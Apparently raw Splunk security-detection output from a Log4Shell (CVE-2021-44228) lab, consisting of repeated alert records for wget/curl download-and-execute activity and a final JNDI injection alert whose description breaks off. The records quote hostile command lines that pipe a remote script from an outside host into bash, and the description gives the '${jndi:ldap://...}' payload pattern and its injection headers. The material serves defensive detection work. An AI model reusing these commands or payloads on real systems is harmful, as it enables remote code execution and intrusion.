annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", 
annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", 
annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", 
annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies 
the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", 
risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint 
sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget 
https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", 
info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", 
annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint 
sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", 
info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", 
annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640952, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Application Log", annotations._all="CIS 16", annotations._all="CIS 3", annotations._all="Stage:Execution", annotations._all="DE.CM", annotations._all="Exploitation", annotations._all="CIS 5", annotations._all="Reconnaissance", annotations._all="CVE-2021-44228", annotations._all="T1190", annotations._frameworks="analytic_story", annotations._frameworks="cis20", 
annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. 
